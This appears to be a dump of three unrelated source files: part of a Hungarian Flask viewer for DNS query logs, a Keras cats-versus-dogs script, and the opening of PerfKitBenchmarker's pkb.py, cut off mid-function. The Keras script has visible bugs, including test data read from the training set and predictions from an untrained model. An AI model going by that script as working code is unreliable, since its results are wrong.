next_page = page_number + 1 if page_number < total_pages else None
query = query.paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_queries.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
total_pages=total_pages,
total_rows=total_rows,
search=search,
true_content=True)
@app.route('/full/')
def table_full():
live_dataset.connect()
dataset = live_dataset # Doesnt override global instance, variable is local.
table = "queries"
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
raw_data = request.args.get('raw_data') == "True"
rows_per_page = app.config['ROWS_PER_PAGE']
search = request.args.get('search')
if search:
query = ds_table.model_class.select().where(ds_table.model_class._meta.fields['domain'].contains(search))
else:
query = ds_table.all()
total_rows = query.count()
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
delete_index = request.args.get('delete')
if delete_index:
#ds_table.delete(id=delete_index)
client = procbridge.Client('127.0.0.1', CONFIG.proc_port)
response = client.request('delete_id', {'id': int(delete_index)})
if response != 'OK':
flash('Nem sikerült végrehajtani a törlés utasítást. Kérjük próbálja meg újra! \nA hiba: ' + str(response))
query = query.paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_queries_full.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
total_pages=total_pages,
total_rows=total_rows,
search=search,
true_content=True,
raw_data=raw_data)
def delete_file(path):
if os.path.exists(path):
print('Deleting {}...'.format(path))
if not dataset._database.is_closed():
dataset.close()
if not live_dataset._database.is_closed():
live_dataset.close()
os.unlink(path)
# TODO remove empty file too?
# TODO test on linux, cause win cannot delete file, that is used by other process
#shutil.rmtree(path)
else:
print("The file does not exist at location: ", path)
@app.route('/delete_databases/')
def delete_databases():
client = procbridge.Client('127.0.0.1', CONFIG.proc_port)
response = client.request('db_shutdown', {'id': '1234'})
print("RESPONSE IS: ", response)
directory = os.path.dirname(CONFIG.database_path)
random_key_file_name = "random.json"
random_key_file_path = os.path.join(directory, random_key_file_name)
config = "config.ini"
CONFIG.completed = True
for item in [config, CONFIG.copied_database_path, random_key_file_path]:
try:
delete_file(item)
except Exception as e:
result = "Hiba a fájl törlése közben. \nA file: " + item + " \nA hiba: " + str(e)
print(result)
return result
return redirect(url_for('thanks'), code=302)
@app.template_filter('format_index')
def format_index(index_sql):
split_regex = re.compile(r'\bon\b', re.I)
if not split_regex.search(index_sql):
return index_sql
create, definition = split_regex.split(index_sql)
return '\nON '.join((create.strip(), definition.strip()))
@app.template_filter('value_filter')
def value_filter(value, max_length=50, field=None):
if field is not None:
if field == "timestamp":
localts = value - offset*60
localtime = datetime.datetime.fromtimestamp(localts)
return localtime
if isinstance(value, numeric):
return value
if isinstance(value, binary_types):
if not isinstance(value, (bytes, bytearray)):
value = bytes(value) # Handle `buffer` type.
value = value.decode('utf-8', decode_handler)
if isinstance(value, unicode_type):
value = escape(value)
if len(value) > max_length:
return ('<span class="truncated">%s</span> '
'<span class="full" style="display:none;">%s</span>'
'<a class="toggle-value" href="#">...</a>') % (
value[:max_length],
value)
return value
@app.template_filter('column_filter_display')
def column_filter_display(column):
nameDict = {"id":"ID", "timestamp":"Időbélyeg", "domain":"Domain", "client":"Kliens", "realIP":"Feloldott IP"}
return nameDict[column]
@app.template_filter('column_filter')
def column_filter(columns):
newColumns = [column for column in columns if column in ["id", "domain", "timestamp", "client", "realIP"]]
return newColumns
column_re = re.compile('(.+?)\((.+)\)', re.S)
column_split_re = re.compile(r'(?:[^,(]|\([^)]*\))+')
def _format_create_table(sql):
create_table, column_list = column_re.search(sql).groups()
columns = [' %s' % column.strip()
for column in column_split_re.findall(column_list)
if column.strip()]
return '%s (\n%s\n)' % (
create_table,
',\n'.join(columns))
@app.template_filter()
def format_create_table(sql):
try:
return _format_create_table(sql)
except:
return sql
@app.template_filter('highlight')
def highlight_filter(data):
return Markup(syntax_highlight(data))
def get_query_images():
accum = []
image_dir = os.path.join(app.static_folder, 'img')
if not os.path.exists(image_dir):
return accum
for filename in sorted(os.listdir(image_dir)):
basename = os.path.splitext(os.path.basename(filename))[0]
parts = basename.split('-')
accum.append((parts, 'img/' + filename))
return accum
#
# Flask application helpers.
#
@app.context_processor
def _general():
return {
'dataset': dataset,
'login_required': True,
}
@app.context_processor
def _now():
return {'now': datetime.datetime.now()}
@app.before_request
def _connect_db():
dataset.connect()
@app.teardown_request
def _close_db(exc):
if not dataset._database.is_closed():
dataset.close()
if not live_dataset._database.is_closed():
live_dataset.close()
class PrefixMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = '/%s' % prefix.strip('/')
self.prefix_len = len(self.prefix)
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith(self.prefix):
environ['PATH_INFO'] = environ['PATH_INFO'][self.prefix_len:]
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
else:
start_response('404', [('Content-Type', 'text/plain')])
return ['URL does not match application prefix.'.encode()]
#
# Script options.
#
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-p',
'--port',
default=80,
help='Port for web interface, default=8080',
type='int')
parser.add_option(
'-H',
'--host',
default='0.0.0.0',
help='Host for web interface, default=127.0.0.1')
parser.add_option(
'-d',
'--debug',
action='store_true',
help='Run server in debug mode')
return parser
def die(msg, exit_code=1):
sys.stderr.write('%s\n' % msg)
sys.stderr.flush()
sys.exit(exit_code)
def open_browser_tab(host, port):
url = 'http://%s:%s/' % (host, port)
def _open_tab(url):
time.sleep(1.5)
webbrowser.open_new_tab(url)
thread = threading.Thread(target=_open_tab, args=(url,))
thread.daemon = True
thread.start()
@app.before_request
def check_password():
session.permanent = True
app.permanent_session_lifetime = datetime.timedelta(minutes=5)
if not session.get('authorized') and request.path != '/login/' and \
not request.path.startswith(('/static/', '/favicon')):
flash('Az adatbázis csak bejelentkezés után tekinthető meg.', 'danger')
session['next_url'] = request.base_url
return redirect(url_for('login'))
else:
if CONFIG.completed and not '/thanks/' in request.path:
return redirect(url_for('thanks'))
def initialize_app():
global dataset
global live_dataset
global migrator
print("OK2")
try:
print("PRIVADOME DB_PATH - : ", CONFIG.database_path)
print("Copydb: ", CONFIG.copied_database_path)
shutil.copy(CONFIG.database_path, CONFIG.copied_database_path)
dataset = SqliteDataSet('sqlite:///{path}'.format(path=CONFIG.copied_database_path), bare_fields=True)
live_dataset = SqliteDataSet('sqlite:///{path}'.format(path=CONFIG.database_path), bare_fields=True)
except Exception as e:
print("Hiba történt a fájl megnyitása közben. Ellenőrizze, hogy a privadome core alkalmazás feltelepült és működik az adatmentés.")
print(e)
raise
#migrator = dataset._migrator
dataset.close()
live_dataset.close()
def main():
global CONFIG
# This function exists to act as a console script entry-point.
parser = get_option_parser()
options, args = parser.parse_args()
if not os.path.exists('config.ini'):
config.init_device(options.debug)
if options.debug:
try:
CONFIG = config.Config(config.ConfigTypes.TEST)
except KeyError:
config.init_device(options.debug)
CONFIG = config.Config(config.ConfigTypes.TEST)
else:
try:
CONFIG = config.Config(config.ConfigTypes.DEFAULT)
except KeyError:
config.init_device(options.debug)
CONFIG = config.Config(config.ConfigTypes.DEFAULT)
initialize_app()
app.run(host=options.host, port=options.port, debug=options.debug)
if __name__ == '__main__':
main()
|
Deep_Learning_CatxDog.py
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
Este é um arquivo de script temporário.
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: demetrios
"""
#%% [1] Import necessarios
import numpy as np
import pandas as pd
from os import listdir
from os.path import join, basename
from PIL import Image
#%% [2] Configuracoes da rede
IMG_HEIGHT = 50
IMG_WIDTH = 50
NUM_CHANNELS = 3
from threading import current_thread, Thread, Lock
from multiprocessing import Queue
# Any results you write to the current directory are saved as output.
#%% [3] Inicializando as configuracoes da rede
batch_size = 500
num_train_images = 25000
num_test_images = 12500
num_train_threads = int(num_train_images/batch_size) # 50
num_test_threads = int(num_test_images/batch_size) # 25
lock = Lock()
#%% [4] Usando fila para coletar os dados
def initialize_queue():
queue = Queue()
return queue
#%% [5] Setando a base dados para teste e treino
train_dir_path = 'dogs-vs-cats/train/'
test_dir_path = 'dogs-vs-cats/test1/'
train_imgs = [join(train_dir_path,f) for f in listdir(train_dir_path)]
test_imgs = [join(test_dir_path,f) for f in listdir(test_dir_path)]
print(len(train_imgs))
print(len(test_imgs))
#%% [6] Pegando o nome das imagens para configurar as categorias
def get_img_label(fpath):
category = fpath.split(".")[-3]
if category == "dog":
return [1,0]
elif category == "cat":
return [0,1]
#%%
def get_img_array_labels(fpaths, queue):
img_array = None
labels = []
for f in fpaths:
arr = Image.open(f)
arr = arr.resize((IMG_HEIGHT,IMG_WIDTH), Image.ANTIALIAS)
arr = np.reshape(arr, (-1, IMG_HEIGHT, IMG_WIDTH, NUM_CHANNELS))
if img_array is None:
img_array = arr
else:
img_array = np.vstack((img_array, arr))
labels.append(get_img_label(basename(f)))
labels = np.array(labels)
queue.put((img_array, labels))
#%%
def get_img_array(fpaths, queue):
img_array = None
for f in fpaths:
arr = Image.open(f)
arr = arr.resize((IMG_HEIGHT,IMG_WIDTH), Image.ANTIALIAS)
arr = np.reshape(arr, (-1, IMG_HEIGHT, IMG_WIDTH, NUM_CHANNELS))
if img_array is None:
img_array = arr
else:
img_array = np.vstack((img_array, arr))
queue.put(img_array)
#%%
def dump_array(fname,arr):
with open(fname,'wb') as f:
pickle.dump(arr,f)
#%%
def load_pickled_array(fname,arr):
with open(fname, 'rb') as f:
return pickle.load(f)
#%%
# using threading combine training array and labels for training data
def get_training_data():
threads_list = list()
train_x = None
train_y = []
queue = initialize_queue()
# iterate over num of threads to create
for thread_index in range(num_train_threads):
start_index = thread_index * batch_size
end_index = (thread_index + 1) * batch_size
file_batch = train_imgs[start_index:end_index]
thread = Thread(target =get_img_array_labels, args=(file_batch, queue))
thread.start()
print("Thread: {}, start index: {}, end index: {}".format(thread.name, start_index, end_index))
threads_list.append(thread)
# join threads
for t in threads_list:
t.join()
while not queue.empty():
arr, labels = queue.get()
train_y.extend(labels)
if train_x is None:
train_x = arr
else:
train_x = np.vstack((train_x, arr))
return train_x, train_y
#%%
# using multithreading combine testing array for testing data
def get_testing_data():
threads_list = list()
test_x = None
queue = initialize_queue()
# iterate over num of threads to create
for thread_index in range(num_test_threads):
start_index = thread_index * batch_size
end_index = (thread_index + 1) * batch_size
file_batch = train_imgs[start_index:end_index]
thread = Thread(target =get_img_array, args=(file_batch, queue))
thread.start()
print("Thread: {}, start index: {}, end index: {}".format(thread.name, start_index, end_index))
threads_list.append(thread)
# join threads
for t in threads_list:
t.join()
print("Thread: {} joined", t.name)
while not queue.empty():
arr= queue.get()
if test_x is None:
test_x = arr
else:
test_x = np.vstack((test_x, arr))
return test_x
#%%
train_x, train_y = get_training_data()
#%%
print(train_x.shape)
print(len(train_y))
#%%
test_x =get_testing_data()
print(test_x.shape)
#%%
import pickle
dump_array('train_arr.pickle',train_x)
dump_array('train_labels.pickle',train_y)
#%%
# dump testing data
dump_array('test_arr.pickle',test_x)
#%%
print("train_x shape",train_x.shape)
print("test_x shape", test_x.shape)
# convert train_y to np. array
train_y = np.array(train_y)
print("train_y.shape", train_y.shape)
#%%
# mean normalize train and test images
train_x = train_x/255
test_x = test_x/255
#%%
# import required packages
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten, BatchNormalization
from keras.layers import Conv2D, MaxPooling2D
from keras.utils import np_utils, to_categorical
from sklearn.model_selection import train_test_split
#%%
# CNN model
# CNN model
model = Sequential()
# -----------------------------------------------------------------------------------
# conv 1
model.add(Conv2D(16, (3,3), input_shape=(50,50,3))) # 148,148,32
model.add(BatchNormalization(axis=3))
model.add(Activation('relu'))
#model.add(Dropout(0.5))
# max pool 1
model.add(MaxPooling2D(pool_size=(2,2),strides=2)) # 72,72,32
# -----------------------------------------------------------------------------------
# conv 2
model.add(Conv2D(16, (3,3))) # 68,68,32
model.add(BatchNormalization(axis=3))
model.add(Activation('relu'))
#model.add(Dropout(0.5))
# max pool 2
model.add(MaxPooling2D(pool_size=(2,2),strides=2)) # 34,34,32
# -----------------------------------------------------------------------------------
# conv 3
model.add(Conv2D(32, (3,3))) # 32,32,32
model.add(BatchNormalization(axis=3))
model.add(Activation('relu'))
#model.add(Dropout(0.7))
# max pool 3
model.add(MaxPooling2D(pool_size=(2,2),strides=2)) # 17,17,32
# -----------------------------------------------------------------------------------
# conv 4
model.add(Conv2D(32, (3,3))) # 15,15,32
model.add(BatchNormalization(axis=3))
model.add(Activation('relu'))
#model.add(Dropout(0.7))
# max pool 4
model.add(MaxPooling2D(pool_size=(2,2),strides=2)) # 7,7,32
# flatten
model.add(Flatten())
# fc layer 1
model.add(Dense(512, activation='relu'))
#model.add(Dropout(0.7))
#model.add(Dense(256, activation='relu'))
#model.add(Dropout(0.5))
# fc layer 2
model.add(Dense(2, activation='softmax'))
#%%
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
#%%
predictions = model.predict(test_x, batch_size=32, verbose=1)
#%%
model.summary()
#%%
import matplotlib.pyplot as plt
#matplotlib inline
fig=plt.figure()
for index in range(12):
# cat: [1,0]
# dog: [0,1]
y = fig.add_subplot(3,4,index+1)
#model_out = model.predict([data])[0]
img = test_x[index]
model_out = predictions[index]
if np.argmax(model_out) == 0: str_label='Dog'
else: str_label='Cat'
y.imshow(img)
plt.title(str_label)
y.axes.get_xaxis().set_visible(False)
y.axes.get_yaxis().set_visible(False)
plt.show()
#%%
with open('submission.csv','w') as f:
f.write('id,label\n')
for index in range(len(test_imgs)):
img_id =basename(test_imgs[index]).split(".")[0]
prob = (predictions[index,0])
#print("index: {}, img_id: {}, prob:{}".format(index,img_id, prob))
f.write("{},{}\n".format(img_id, prob))
|
pkb.py
|
# Copyright 2019 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs all benchmarks in PerfKitBenchmarker.
All benchmarks in PerfKitBenchmarker export the following interface:
GetConfig: this returns, the name of the benchmark, the number of machines
required to run one instance of the benchmark, a detailed description
of the benchmark, and if the benchmark requires a scratch disk.
Prepare: this function takes a list of VMs as an input parameter. The benchmark
will then get all binaries required to run the benchmark and, if
required, create data files.
Run: this function takes a list of VMs as an input parameter. The benchmark will
then run the benchmark upon the machines specified. The function will
return a dictonary containing the results of the benchmark.
Cleanup: this function takes a list of VMs as an input parameter. The benchmark
will then return the machine to the state it was at before Prepare
was called.
PerfKitBenchmarker has the following run stages: provision, prepare,
run, cleanup, teardown, and all.
provision: Read command-line flags, decide what benchmarks to run, and
create the necessary resources for each benchmark, including
networks, VMs, disks, and keys, and generate a run_uri, which can
be used to resume execution at later stages.
prepare: Execute the Prepare function of each benchmark to install
necessary software, upload datafiles, etc.
run: Execute the Run function of each benchmark and collect the
generated samples. The publisher may publish these samples
according to PKB's settings. The Run stage can be called multiple
times with the run_uri generated by the provision stage.
cleanup: Execute the Cleanup function of each benchmark to uninstall
software and delete data files.
teardown: Delete VMs, key files, networks, and disks created in the
'provision' stage.
all: PerfKitBenchmarker will run all of the above stages (provision,
prepare, run, cleanup, teardown). Any resources generated in the
provision stage will be automatically deleted in the teardown
stage, even if there is an error in an earlier stage. When PKB is
running in this mode, the run cannot be repeated or resumed using
the run_uri.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import getpass
import itertools
import json
import logging
import multiprocessing
from os.path import isfile
import random
import re
import sys
import threading
import time
from typing import List, Optional
import uuid
from absl import flags
from perfkitbenchmarker import archive
from perfkitbenchmarker import background_tasks
from perfkitbenchmarker import benchmark_lookup
from perfkitbenchmarker import benchmark_sets
from perfkitbenchmarker import benchmark_spec
from perfkitbenchmarker import benchmark_status
from perfkitbenchmarker import configs
from perfkitbenchmarker import context
from perfkitbenchmarker import disk
from perfkitbenchmarker import errors
from perfkitbenchmarker import events
from perfkitbenchmarker import flag_util
from perfkitbenchmarker import linux_benchmarks
from perfkitbenchmarker import log_util
from perfkitbenchmarker import os_types
from perfkitbenchmarker import package_lookup
from perfkitbenchmarker import requirements
from perfkitbenchmarker import sample
from perfkitbenchmarker import spark_service
from perfkitbenchmarker import stages
from perfkitbenchmarker import static_virtual_machine
from perfkitbenchmarker import timing_util
from perfkitbenchmarker import traces
from perfkitbenchmarker import version
from perfkitbenchmarker import vm_util
from perfkitbenchmarker import windows_benchmarks
from perfkitbenchmarker.configs import benchmark_config_spec
from perfkitbenchmarker.linux_benchmarks import cluster_boot_benchmark
from perfkitbenchmarker.publisher import SampleCollector
import six
from six.moves import zip
LOG_FILE_NAME = 'pkb.log'
COMPLETION_STATUS_FILE_NAME = 'completion_statuses.json'
REQUIRED_INFO = ['scratch_disk', 'num_machines']
REQUIRED_EXECUTABLES = frozenset(['ssh', 'ssh-keygen', 'scp', 'openssl'])
MAX_RUN_URI_LENGTH = 12
FLAGS = flags.FLAGS
# Define patterns for help text processing.
BASE_RELATIVE = '../' # Relative path from markdown output to PKB home for link writing.
MODULE_REGEX = r'^\s+?(.*?):.*' # Pattern that matches module names.
FLAGS_REGEX = r'(^\s\s--.*?(?=^\s\s--|\Z))+?' # Pattern that matches each flag.
FLAGNAME_REGEX = r'^\s+?(--.*?)(:.*\Z)' # Pattern that matches flag name in each flag.
DOCSTRING_REGEX = r'"""(.*?|$)"""' # Pattern that matches triple quoted comments.
flags.DEFINE_list('ssh_options', [], 'Additional options to pass to ssh.')
flags.DEFINE_boolean('use_ipv6', False, 'Whether to use ipv6 for ssh/scp.')
flags.DEFINE_list('benchmarks', [benchmark_sets.STANDARD_SET],
'Benchmarks and/or benchmark sets that should be run. The '
'default is the standard set. For more information about '
'benchmarks and benchmark sets, see the README and '
'benchmark_sets.py.')
flags.DEFINE_boolean('multi_os_benchmark', False, 'Whether is benchmark will '
'involve multiple os types.')
flags.DEFINE_string('archive_bucket', None,
'Archive results to the given S3/GCS bucket.')
flags.DEFINE_string('project', None, 'GCP project ID under which '
'to create the virtual machines')
flags.DEFINE_multi_string(
'zone', [],
'Similar to the --zones flag, but allows the flag to be specified '
'multiple times on the commandline. For example, --zone=a --zone=b is '
'equivalent to --zones=a,b. Furthermore, any values specified by --zone '
'will be appended to those specfied by --zones.')
flags.DEFINE_list(
'zones', [],
'A list of zones within which to run PerfKitBenchmarker. '
'This is specific to the cloud provider you are running on. '
'If multiple zones are given, PerfKitBenchmarker will create 1 VM in '
'zone, until enough VMs are created as specified in each '
'benchmark. The order in which this flag is applied to VMs is '
'undefined.')
flags.DEFINE_list(
'extra_zones', [],
'Zones that will be appended to the "zones" list. This is functionally '
'the same, but allows flag matrices to have two zone axes.')
# TODO(user): note that this is currently very GCE specific. Need to create a
# module which can translate from some generic types to provider specific
# nomenclature.
flags.DEFINE_string('machine_type', None, 'Machine '
'types that will be created for benchmarks that don\'t '
'require a particular type.')
flags.DEFINE_integer('num_vms', 1, 'For benchmarks which can make use of a '
'variable number of machines, the number of VMs to use.')
flags.DEFINE_string('image', None, 'Default image that will be '
'linked to the VM')
flags.DEFINE_string('run_uri', None, 'Name of the Run. If provided, this '
'should be alphanumeric and less than or equal to %d '
'characters in length.' % MAX_RUN_URI_LENGTH)
flags.DEFINE_boolean('use_pkb_logging', True, 'Whether to use PKB-specific '
'logging handlers. Disabling this will use the standard '
'ABSL logging directly.')
flags.DEFINE_boolean('log_dmesg', False, 'Whether to log dmesg from '
'each VM to the PKB log file before the VM is deleted.')
flags.DEFINE_boolean('always_teardown_on_exception', False, 'Whether to tear '
'down VMs when there is exception during the PKB run. If'
'enabled, VMs will be torn down even if FLAGS.run_stage '
'does not specify teardown.')
def GetCurrentUser():
"""Get the current user name.
On some systems the current user information may be unavailable. In these
cases we just need a string to tag the created resources with. It should
not be a fatal error.
Returns:
User name OR default string if user name not available.
"""
try:
return getpass.getuser()
except KeyError:
return 'user_unknown'
flags.DEFINE_string(
'owner', GetCurrentUser(), 'Owner name. '
'Used to tag created resources and performance records.')
flags.DEFINE_enum(
'log_level', log_util.INFO,
list(log_util.LOG_LEVELS.keys()),
'The log level to run at.')
flags.DEFINE_enum(
'file_log_level', log_util.DEBUG, list(log_util.LOG_LEVELS.keys()),
'Anything logged at this level or higher will be written to the log file.')
flags.DEFINE_integer('duration_in_seconds', None,
'duration of benchmarks. '
'(only valid for mesh_benchmark)')
flags.DEFINE_string('static_vm_file', None,
'The file path for the Static Machine file. See '
'static_virtual_machine.py for a description of this file.')
flags.DEFINE_boolean('version', False, 'Display the version and exit.',
allow_override_cpp=True)
flags.DEFINE_boolean('time_commands', False, 'Times each command issued.')
flags.DEFINE_enum(
'scratch_disk_type', None,
[disk.STANDARD, disk.REMOTE_SSD, disk.PIOPS, disk.LOCAL],
'Type for all scratch disks. The default is standard')
flags.DEFINE_string(
'data_disk_type', None,
'Type for all data disks. If a provider keeps the operating system and '
'user data on separate disks, this only affects the user data disk(s).'
'If the provider has OS and user data on the same disk, this flag affects'
'that disk.')
flags.DEFINE_integer('scratch_disk_size', None, 'Size, in gb, for all scratch '
'disks.')
flags.DEFINE_integer('data_disk_size', None, 'Size, in gb, for all data disks.')
flags.DEFINE_integer('scratch_disk_iops', None,
'IOPS for Provisioned IOPS (SSD) volumes in AWS.')
flags.DEFINE_integer('num_striped_disks', None,
'The number of data disks to stripe together to form one '
'"logical" data disk. This defaults to 1 '
'(except with local disks), which means no striping. '
'When using local disks, they default to striping '
'all disks together. The striped disks will appear as '
'one disk (data_disk_0) in the metadata.',
lower_bound=1)
flags.DEFINE_bool('install_packages', None,
'Override for determining whether packages should be '
'installed. If this is false, no packages will be installed '
'on any VMs. This option should probably only ever be used '
'if you have already created an image with all relevant '
'packages installed.')
flags.DEFINE_bool(
'stop_after_benchmark_failure', False,
'Determines response when running multiple benchmarks serially and a '
'benchmark run fails. When True, no further benchmarks are scheduled, and '
'execution ends. When False, benchmarks continue to be scheduled. Does not '
'apply to keyboard interrupts, which will always prevent further '
'benchmarks from being scheduled.')
flags.DEFINE_boolean(
'ignore_package_requirements', False,
'Disables Python package requirement runtime checks.')
flags.DEFINE_enum('spark_service_type', None,
[spark_service.PKB_MANAGED, spark_service.PROVIDER_MANAGED],
'Type of spark service to use')
flags.DEFINE_boolean(
'publish_after_run', False,
'If true, PKB will publish all samples available immediately after running '
'each benchmark. This may be useful in scenarios where the PKB run time '
'for all benchmarks is much greater than a single benchmark.')
flags.DEFINE_integer(
'publish_period', None,
'The period in seconds to publish samples from repeated run stages. '
'This will only publish samples if publish_after_run is True.')
flags.DEFINE_integer(
'run_stage_time', 0,
'PKB will run/re-run the run stage of each benchmark until it has spent '
'at least this many seconds. It defaults to 0, so benchmarks will only '
'be run once unless some other value is specified. This flag and '
'run_stage_iterations are mutually exclusive.')
flags.DEFINE_integer(
'run_stage_iterations', 1,
'PKB will run/re-run the run stage of each benchmark this many times. '
'It defaults to 1, so benchmarks will only be run once unless some other '
'value is specified. This flag and run_stage_time are mutually exclusive.')
flags.DEFINE_integer(
'run_stage_retries', 0,
'The number of allowable consecutive failures during the run stage. After '
'this number of failures any exceptions will cause benchmark termination. '
'If run_stage_time is exceeded, the run stage will not be retried even if '
'the number of failures is less than the value of this flag.')
flags.DEFINE_boolean(
'boot_samples', False,
'Whether to publish boot time samples for all tests.')
flags.DEFINE_integer(
'run_processes', None,
'The number of parallel processes to use to run benchmarks.',
lower_bound=1)
flags.DEFINE_float(
'run_processes_delay', None,
'The delay in seconds between parallel processes\' invocation. '
'Increasing this value may reduce provider throttling issues.',
lower_bound=0)
flags.DEFINE_string(
'completion_status_file', None,
'If specified, this file will contain the completion status of each '
'benchmark that ran (SUCCEEDED, FAILED, or SKIPPED). The file has one json '
'object per line, each with the following format:\n'
'{ "name": <benchmark name>, "flags": <flags dictionary>, '
'"status": <completion status> }')
flags.DEFINE_string(
'helpmatch', '',
'Shows only flags defined in a module whose name matches the given regex.',
allow_override_cpp=True)
flags.DEFINE_string(
'helpmatchmd', '',
'helpmatch query with markdown friendly output. '
'Shows only flags defined in a module whose name matches the given regex.',
allow_override_cpp=True)
flags.DEFINE_boolean(
'create_failed_run_samples', False,
'If true, PKB will create a sample specifying that a run stage failed. '
'This sample will include metadata specifying the run stage that '
'failed, the exception that occurred, as well as all the flags that '
'were provided to PKB on the command line.')
flags.DEFINE_boolean(
'create_started_run_sample', False,
'Whether PKB will create a sample at the start of the provision phase of '
'the benchmark run.')
flags.DEFINE_integer(
'failed_run_samples_error_length', 10240,
'If create_failed_run_samples is true, PKB will truncate any error '
'messages at failed_run_samples_error_length.')
flags.DEFINE_boolean(
'dry_run', False,
'If true, PKB will print the flags configurations to be run and exit. '
'The configurations are generated from the command line flags, the '
'flag_matrix, and flag_zip.')
flags.DEFINE_string(
'skip_pending_runs_file', None,
'If file exists, any pending runs will be not be executed.')
flags.DEFINE_boolean(
'use_vpn', False,
'Creates VPN tunnels between vm_groups')
flags.DEFINE_integer(
'after_prepare_sleep_time', 0,
'The time in seconds to sleep after the prepare phase. This can be useful '
'for letting burst tokens accumulate.')
flags.DEFINE_integer(
'after_run_sleep_time', 0,
'The time in seconds to sleep after the run phase. This can be useful '
'for letting the VM sit idle after the bechmarking phase is complete.')
flags.DEFINE_bool(
'before_run_pause', False,
'If true, wait for command line input before executing the run phase. '
'This is useful for debugging benchmarks during development.')
flags.DEFINE_bool(
'before_cleanup_pause', False,
'If true, wait for command line input before executing the cleanup phase. '
'This is useful for debugging benchmarks during development.')
flags.DEFINE_integer(
'timeout_minutes', 240,
'An upper bound on the time in minutes that the benchmark is expected to '
'run. This time is annotated or tagged on the resources of cloud '
'providers.')
flags.DEFINE_integer(
'persistent_timeout_minutes', 240,
'An upper bound on the time in minutes that resources left behind by the '
'benchmark. Some benchmarks purposefully create resources for other '
'benchmarks to use. Persistent timeout specifies how long these shared '
'resources should live.')
flags.DEFINE_bool('disable_interrupt_moderation', False,
'Turn off the interrupt moderation networking feature')
flags.DEFINE_bool('disable_rss', False,
'Whether or not to disable the Receive Side Scaling feature.')
flags.DEFINE_boolean('record_lscpu', True,
'Whether to record the lscpu output in a sample')
flags.DEFINE_boolean('record_proccpu', True,
'Whether to record the /proc/cpuinfo output in a sample')
flags.DEFINE_boolean('record_cpu_vuln', True,
'Whether to record the CPU vulnerabilities on linux VMs')
# Support for using a proxy in the cloud environment.
flags.DEFINE_string('http_proxy', '',
'Specify a proxy for HTTP in the form '
'[user:passwd@]proxy.server:port.')
flags.DEFINE_string('https_proxy', '',
'Specify a proxy for HTTPS in the form '
'[user:passwd@]proxy.server:port.')
flags.DEFINE_string('ftp_proxy', '',
'Specify a proxy for FTP in the form '
'[user:passwd@]proxy.server:port.')
flags.DEFINE_bool('randomize_run_order', False,
'When running with more than one benchmarks, '
'randomize order of the benchmarks.')
_TEARDOWN_EVENT = multiprocessing.Event()
events.initialization_complete.connect(traces.RegisterAll)
def _InjectBenchmarkInfoIntoDocumentation():
"""Appends each benchmark's information to the main module's docstring."""
# TODO: Verify if there is other way of appending additional help
# message.
# Inject more help documentation
# The following appends descriptions of the benchmarks and descriptions of
# the benchmark sets to the help text.
benchmark_sets_list = [
'%s: %s' %
(set_name, benchmark_sets.BENCHMARK_SETS[set_name]['message'])
for set_name in benchmark_sets.BENCHMARK_SETS]
sys.modules['__main__'].__doc__ = (
'PerfKitBenchmarker version: {version}\n\n{doc}\n'
'Benchmarks (default requirements):\n'
'\t{benchmark_doc}').format(
version=version.VERSION,
doc=__doc__,
benchmark_doc=_GenerateBenchmarkDocumentation())
sys.modules['__main__'].__doc__ += ('\n\nBenchmark Sets:\n\t%s'
% '\n\t'.join(benchmark_sets_list))
def _ParseFlags(argv=sys.argv):
"""Parses the command-line flags."""
try:
argv = FLAGS(argv)
except flags.Error as e:
logging.error(e)
logging.info('For usage instructions, use --helpmatch={module_name}')
logging.info('For example, ./pkb.py --helpmatch=benchmarks.fio')
sys.exit(1)
def _PrintHelp(matches=None):
"""Prints help for flags defined in matching modules.
Args:
matches: regex string or None. Filters help to only those whose name
matched the regex. If None then all flags are printed.
"""
if not matches:
print(FLAGS)
else:
flags_by_module = FLAGS.flags_by_module_dict()
modules = sorted(flags_by_module)
regex = re.compile(matches)
for module_name in modules:
if regex.search(module_name):
print(FLAGS.module_help(module_name))
def _PrintHelpMD(matches=None):
"""Prints markdown formatted help for flags defined in matching modules.
Works just like --helpmatch.
Args:
